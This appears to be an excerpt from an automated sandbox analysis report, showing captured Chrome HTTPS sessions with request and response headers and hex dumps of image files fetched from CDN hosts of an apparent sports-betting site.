                                                                                                                                                          2024-06-09 22:41:23 UTC15767INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9b 00 00 00 9b 08 06 00 00 00 75 61 e9 8c 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 00 00 00 00 00 f9 43 bb 7f 00 00 80 00 49 44 41 54 78 da ec fd 77 b8 a5 55 79 ff 8f bf 56 79 ca ee a7 9f e9 0c 43 ef bd 2a 20 a0 54 63 8f 1a 4d 0c 28 08 d6 98 66 8a f9 7c 62 4c be 31 cd 7c 63 62 a3 d8 c0 82 25 11 bb f4 a2 08 08 cc 50 07 66 98 de 4e 6f bb 3e 6d ad f5 fb e3 d9 e7 cc 0c 52 34 80 7c f3 bb b2 ae 6b 5f 53 ce 3e 7b 3f cf 5a f7 73 d7 f7 fd be 05 ff bb 9e 65 49 14 0a 23 57 70 c0 9f 7e fd b5 93 6a df eb 7b 9c 8f 4d 0d a9 56 94 a3 27 ce 5e ff a9 df
                                                                                                                                                          Data Ascii: PNGIHDRuagAMAa cHRMz&u0`:pQ<bKGDCIDATxwUyVyC* TcM(f|bL1|cb%PfNo>mR4|k_S>{?ZseI#Wp~j{MV'^
                                                                                                                                                          2024-06-09 22:41:23 UTC16384INData Raw: e4 fc cb df db 8b 0e 0f 52 15 ff f8 d3 ce 3b ef b6 9f 7e ef 5a 03 29 42 42 6c 0d 28 81 15 9c f4 42 6f 9c 73 4e 24 49 2a 85 10 24 59 8c 49 63 02 a0 e0 07 f4 0d 0e 30 33 37 c7 8c 99 a3 54 08 28 16 0a 68 a5 90 32 6f 46 51 32 1f 6e 2b 84 a0 dd ee b0 6b cb 66 6e b9 e9 46 9e 5c bf 9e be 9e 5e ea b3 73 44 ed 36 fb ac 5c c9 d1 47 1e c9 3e ab 56 52 2c 97 51 5e 3e f3 c9 39 81 17 14 a8 f5 f6 d3 69 46 64 5a 50 ad f5 e0 79 1e 71 1c 13 86 39 91 b8 b5 26 6f 9a 71 96 55 fb 1e c4 ae f1 ad cc ce e6 ed 9c 95 6a 48 ad af cc 4c a3 49 3d 32 18 13 0b 6b ad 94 52 ee f6 90 7f 43 29 90 a7 f4 ae 9e 94 66 c9 f7 84 90 38 07 17 be fe b5 9e e7 b9 e3 53 d7 98 96 d9 d4 8d 37 5e fd d9 b9 9c 96 21 01 9b 63 1a ed d3 71 95 98 04 bc 0e 81 32 23 b2 5c db 97 a0 f7 11 e2 26 da 64 5d 66 9b 60 90
                                                                                                                                                          Data Ascii: R;~Z)BBl(BosN$I*$YIc037T(h2oFQ2n+kfnF\^sD6\G>VR,Q^>9iFdZPyq9&oqUjHLI=2kRC)f8S7^!cq2#\&d]f`
                                                                                                                                                          2024-06-09 22:41:23 UTC10625INData Raw: 59 78 3c 46 0b 4c 8c 30 4d 4d 37 09 d2 c1 71 3c a5 95 be 26 8a e3 ad da 18 91 8c 78 6c b1 17 7e d7 da 75 3e 82 ad 87 14 3b 3a e8 eb ef 6b 49 d4 b7 7f b5 40 5e c7 21 9b cd 12 04 01 f3 e6 cd a3 bf bf 1f 63 0c 5d c5 4e e6 f5 cf a5 23 97 47 27 5b 6e 2b 03 86 5d 78 6b f0 fc 26 98 e6 63 db 9f f3 bb d7 ae d2 0a 52 c8 d6 4d 51 2a 95 d0 48 e6 cd 5f c8 dc 81 05 ec b1 e7 5e 08 c7 25 9b cf 33 35 35 c5 c6 8d 9b a8 57 6b b8 12 e2 7a 85 8d eb d7 b3 e1 99 75 4c 8c 0c 53 9a 18 41 ab 90 7a d8 58 91 ee ea 7c a3 10 5e 6c 54 f2 5e 51 04 8d 98 20 df 77 d2 49 97 7e ec 64 fc 6e 50 13 fc e6 fa 7f 7d d8 89 06 7f 1e 3a de b1 07 bf f7 4b a7 ef fd b6 ff f0 10 fd 76 17 92 06 5c a7 45 a7 75 d0 78 c4 09 fb 43 bf e0 16 ba fb ef 9c 26 c3 de b4 6a 51 0a 8c c3 c2 43 4f 78 3a eb b3 7f 21 dc
                                                                                                                                                          Data Ascii: Yx<FL0MM7q<&xl~u>;:kI@^!c]N#G'[n+]xk&cRMQ*H_^%355WkzuLSAzX|^lT^Q wI~dnP}:Kv\EuxC&jQCOx:!


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          651192.168.2.55043290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:22 UTC609OUTGET /pc/image-pc/index/312/nav/sports/yabo.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:23 UTC617INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:22 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 44327
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:55 GMT
                                                                                                                                                          ETag: "5d71fe87-ad27"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[4],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE29[3],EU-FRA-paris-GLOBAL1-CACHE25[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465100
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: d07d56e3e8d13cba53af342c70946ec5
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126900
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:23 UTC15767INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9b 00 00 00 9b 08 06 00 00 00 75 61 e9 8c 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                                                                                                                          Data Ascii: PNGIHDRuatEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01
                                                                                                                                                          2024-06-09 22:41:23 UTC16384INData Raw: 6c 40 ad 39 32 e3 e1 0f b5 06 e7 46 41 20 aa 2d 4b 5b c1 9d e8 8a 69 ee d2 1e 3b 37 c9 3c 8f 17 9d bc 78 7d 34 1a fb aa 1b d5 89 89 5c c1 4d e9 31 a6 05 3e 1c 00 12 fd 8a 92 61 5e 6f 49 f6 21 9f e2 41 b4 4b d8 7a 48 23 27 40 2a 8e 37 95 b3 a0 a8 d4 05 ab 4e 5c 02 17 5c 72 1c 9c 7d f6 4a a8 6d f0 e0 1c b0 21 9d f0 81 a1 06 99 77 df 40 d2 2f 60 47 03 a9 0c de 9b 27 f7 1e ec 58 3f 76 a2 8b 15 30 e6 38 f1 90 93 93 9e 49 6b e7 a5 84 ed a8 51 26 21 f2 7a 95 b6 7b 50 ed 35 37 36 42 2e 9b c1 c9 e1 a8 d9 82 ea 2a f8 b3 58 ce 1b 0e 32 49 1d 4a 5b 92 d1 4a 0e 86 02 10 f4 07 d1 42 cd b2 25 79 89 44 1a 96 ad 58 09 e7 5f 78 21 b8 cd 20 34 2f 5e 09 73 56 9e 0a fb fb 65 e8 dc af c1 82 3a 09 3c b2 02 8b 4f 5a 0e c5 e1 52 76 2c 4a 30 a0 bf 34 51 3c 6e 17 aa 70 8d a9 53 dd
                                                                                                                                                          Data Ascii: l@92FA -K[i;7<x}4\M1>a^oI!AKzH#'@*7N\\r}Jm!w@/`G'X?v08IkQ&!z{P576B.*X2IJ[JB%yDX_x! 4/^sVe:<OZRv,J04Q<npS
                                                                                                                                                          2024-06-09 22:41:23 UTC12176INData Raw: 25 e8 6d 1d f8 70 dc d5 b4 f4 f2 49 7f 91 55 dc e4 7d 8c cd 21 96 dc f0 e9 5e 5f 6a 09 36 5d 65 81 33 ed 49 f6 be 97 b6 38 0e 04 d4 5c da a3 13 2e a2 43 b8 76 e7 09 dc 79 e5 25 7b 34 25 f5 15 72 e1 36 63 5f 95 2e 8a 90 aa c9 d8 35 70 83 b9 10 cc 62 ec a6 02 0c d2 e5 88 24 ea 99 87 98 95 9c 62 1c 42 36 34 d5 54 f5 a2 03 dc da 63 c3 57 fe ec b7 d8 b8 8b cc 62 9a 17 96 c1 01 64 db fb 51 7b f6 0a 84 3b 4e c1 91 f3 60 a8 8f 0e f2 79 16 54 13 ae 0c 45 06 08 73 f5 a2 ae ae 0a b3 66 4f c7 b4 a6 29 98 33 77 3a 1a 67 cc 92 9d 05 19 0a 6d 3d 84 e9 38 ff f0 52 76 c9 6b c1 8b 83 c5 22 f6 d7 d6 de 29 5c 3a 8f d7 0d 4f c0 4b 46 e7 c7 94 a9 73 30 77 c1 72 94 57 4c 47 73 6b 27 f6 1e 27 3c e7 f4 51 62 55 89 94 c2 33 01 43 e8 eb ee 40 ce 14 3c 64 05 70 97 db 21 46 c6 c3 dd
                                                                                                                                                          Data Ascii: %mpIU}!^_j6]e3I8\.Cvy%{4%r6c_.5pb$bB64TcWbdQ{;N`yTEsfO)3w:gm=8Rvk")\:OKFs0wrWLGsk''<QbU3C@<dp!F


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          652192.168.2.55043390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:22 UTC606OUTGET /pc/image-pc/index/312/nav/sports/s.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:23 UTC629INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:22 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 46607
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:54 GMT
                                                                                                                                                          ETag: "5d71fe86-b60f"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[5],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE10[296],EU-GER-frankfurt-GLOBAL1-CACHE7[0,TCP_HIT,295],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465100
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 3400bb4b3449f26cc20a1703a19e4c53
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 7105847
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:23 UTC15755INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9b 00 00 00 9b 08 06 00 00 00 75 61 e9 8c 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                                                                                                                          Data Ascii: PNGIHDRuatEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01
                                                                                                                                                          2024-06-09 22:41:23 UTC16384INData Raw: 72 f5 2a 58 d5 d9 0d 33 28 1c 66 f1 b9 c6 ee a5 10 c6 63 8e ee 3d 00 5e ba 52 49 a7 e5 ce e8 0d 50 0c b1 3d 42 78 08 21 33 99 ce a6 40 6c 8a 81 8d 33 ce 85 e0 a5 98 5a 36 93 a7 24 15 5a 5c 01 5d 24 ad 00 cb 33 b5 aa 21 c8 44 3c 2f 1a 89 56 d3 59 38 79 e8 5e 68 b2 b2 8d 6c bc 3e 08 05 ab 00 d4 75 ad dd e3 f3 dd 1e af 6f 78 a5 1e 71 ac 08 cd ab 96 29 bc cb bb 92 13 dd 03 32 e8 2f 88 8e 3e 5a 74 35 ea 16 7d 2e 14 7a e7 b6 5c 60 2d 68 ae c6 79 4d 10 44 b7 cd 09 8d 9c 20 9f c6 06 d4 c4 05 2a 54 d4 22 03 fd bb e7 d5 1d ad e9 8e 9f 8f dc 66 16 25 16 7d b9 ab 3e f0 56 87 4f 1f 3a 55 0c f5 b0 9a a9 f4 c4 e9 ab 0b a9 d9 a5 96 9b a3 6d 2f 98 9a d2 48 81 22 9f 6a 44 95 95 45 f3 1d 69 ae 67 6e c1 d1 aa ca 8c 06 d7 85 26 bf 88 dc 4c 2d 64 a1 82 2e 52 43 8b e0 a0 7b 18
                                                                                                                                                          Data Ascii: r*X3(fc=^RIP=Bx!3@l3Z6$Z\]$3!D</VY8y^hl>uoxq)2/>Zt5}.z\`-hyMD *T"f%}>VO:Um/H"jDEign&L-d.RC{
                                                                                                                                                          2024-06-09 22:41:23 UTC14468INData Raw: 1d fd f1 f1 47 e9 d2 4b 2f 15 f4 07 f8 45 70 88 20 64 94 d4 f0 21 0a 90 49 c7 9a 9d 0f 4a 9a 35 ce 43 8f 3f 43 df f8 ca 57 38 a8 80 c6 e3 28 3b e4 25 b3 ca 26 9f 05 41 41 df 6c 55 5d 3d 45 58 33 c1 24 a2 9a 11 63 9f d2 c7 01 c5 f8 c4 24 95 b3 00 86 c1 e3 c1 5a 3c c4 da 1c a8 69 63 a1 91 35 60 1e 0d 8f 0c 8a d0 e3 7e 05 9d 6c d0 0a 5f 89 9f ad 01 69 8c d2 83 ab 4e 85 e8 8a 2b af bf cf 9a 97 77 52 18 b9 e2 9a 6f 64 09 ff d0 0a d0 6b 4a 25 23 f1 9c 33 23 2f 3f 75 ff d1 2b 2e 9a 89 ea d0 a4 66 f5 f1 8f eb 54 01 4c b6 ee d3 a4 42 fe 19 66 74 e7 64 d1 5f 23 70 9a 0c 2f fe 7c 63 51 ab 35 1d f7 f4 e8 a2 5a b1 96 eb d7 6f bc e7 b1 87 1e ba 6b 74 b0 df 0a 8d 66 e3 b0 1c e1 bf 1a 3d 87 5a 05 ae 8d 4d c8 3a ce d0 48 58 10 e9 ff f4 fb 44 30 05 ce 1c 89 4e 77 5c c1 d9
                                                                                                                                                          Data Ascii: GK/Ep d!IJ5C?CW8(;%&AAlU]=EX3$c$Z<ic5`~l_iN+wRodkJ%#3#/?u+.fTLBftd_#p/|cQ5Zoktf=ZM:HXD0Nw\


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          653192.168.2.55043790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:22 UTC647OUTGET /pc/image-pc/index/125/top/icon_hot.gif HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4043.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:22 UTC614INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:22 GMT
                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                          Content-Length: 1818
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 02:48:02 GMT
                                                                                                                                                          ETag: "64bf37e2-71a"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[3],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE2[2],EU-FRA-paris-GLOBAL1-CACHE10[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063154
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: a9113fdb088b06de6f8568ea1a3dc7b9
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528846
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:22 UTC1818INData Raw: 47 49 46 38 39 61 1d 00 10 00 f6 00 00 ff c0 0c f9 bb 0c f5 b9 0c f0 b7 0b ef b6 0b ee b5 0b da a8 09 d1 a3 08 bb 94 07 b2 8e 06 b1 8e 06 b0 8d 06 ff 66 8a 87 70 04 86 6f 04 84 6e 04 7f 6b 03 7d 69 03 ff 00 3c f9 00 3b f5 00 3a f0 00 38 ef 00 38 ee 00 38 da 00 33 d1 00 31 bb 00 2c b1 00 2a b0 00 29 b2 00 2a 87 00 20 86 00 20 84 00 1f 7f 00 1e 7d 00 1d 4c 00 12 4b 00 12 45 00 10 30 00 0b 2f 00 0b 26 00 09 18 00 06 11 00 04 ff ff ff ff 90 18 f9 8e 17 f5 8c 17 ef 8a 16 f0 8a 16 ee 8a 15 da 82 13 d1 7e 11 bb 76 0f b1 72 0d b2 72 0d b0 71 0d 87 5e 08 86 5d 08 84 5c 08 7f 5a 07 7d 59 07 ff 60 24 f9 5f 23 f5 5e 23 ef 5e 21 ee 5d 21 f0 5d 21 da 59 1d d1 58 1b bb 54 17 b2 52 16 b1 52 16 b0 51 15 87 47 0e 84 46 0d 86 46 0e 7f 44 0d 7d 43 0d 4c 31 06 4b 31 06 45 2e
                                                                                                                                                          Data Ascii: GIF89afponk}i<;:88831,*)* }LKE0/&~vrrq^]\Z}Y`$_#^#^!]!]!YXTRRQGFFD}CL1K1E.


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          654192.168.2.550427103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:22 UTC385OUTGET /zb-cloud/pwv/sn.website.pronotice.list HTTP/1.1
                                                                                                                                                          Host: ocsapi-lc.tingmeikj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:23 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:23 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 30 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.0
                                                                                                                                                          2024-06-09 22:41:23 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 32 33 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:23 GMT
                                                                                                                                                          2024-06-09 22:41:23 UTC16INData Raw: 61 70 69 2d 65 6c 61 70 73 65 64 3a 20 30 0d 0a
                                                                                                                                                          Data Ascii: api-elapsed: 0
                                                                                                                                                          2024-06-09 22:41:23 UTC34INData Raw: 78 2d 73 65 72 76 65 72 3a 20 41 6b 61 6d 61 69 4e 65 74 53 74 6f 72 61 67 65 28 6a 70 31 36 29 0d 0a
                                                                                                                                                          Data Ascii: x-server: AkamaiNetStorage(jp16)
                                                                                                                                                          2024-06-09 22:41:23 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:23 UTC82INData Raw: 58 2d 56 69 61 3a 20 31 2e 31 20 61 77 73 3a 6a 70 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 2c 20 31 2e 31 20 6f 63 73 61 70 69 3a 30 30 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 0d 0a
                                                                                                                                                          Data Ascii: X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          2024-06-09 22:41:23 UTC36INData Raw: 58 2d 43 61 63 68 65 3a 20 4d 49 53 53 20 66 72 6f 6d 20 73 67 31 2d 63 64 6e 62 31 33 34 2d 30 32 31 0d 0a
                                                                                                                                                          Data Ascii: X-Cache: MISS from sg1-cdnb134-021
                                                                                                                                                          2024-06-09 22:41:23 UTC20INData Raw: 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 34 0d 0a
                                                                                                                                                          Data Ascii: Content-Length: 24
                                                                                                                                                          2024-06-09 22:41:23 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                                                                          Data Ascii: Connection: close
                                                                                                                                                          2024-06-09 22:41:23 UTC2INData Raw: 0d 0a
                                                                                                                                                          Data Ascii:


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          655192.168.2.55042843.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:22 UTC368OUTGET /pc/image-pc/video/og_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:23 UTC346INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:22 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          ETag: "5ab34b0d-3d3c"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          Content-Length: 15676
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 7127628889184766323
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:23 UTC3827INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
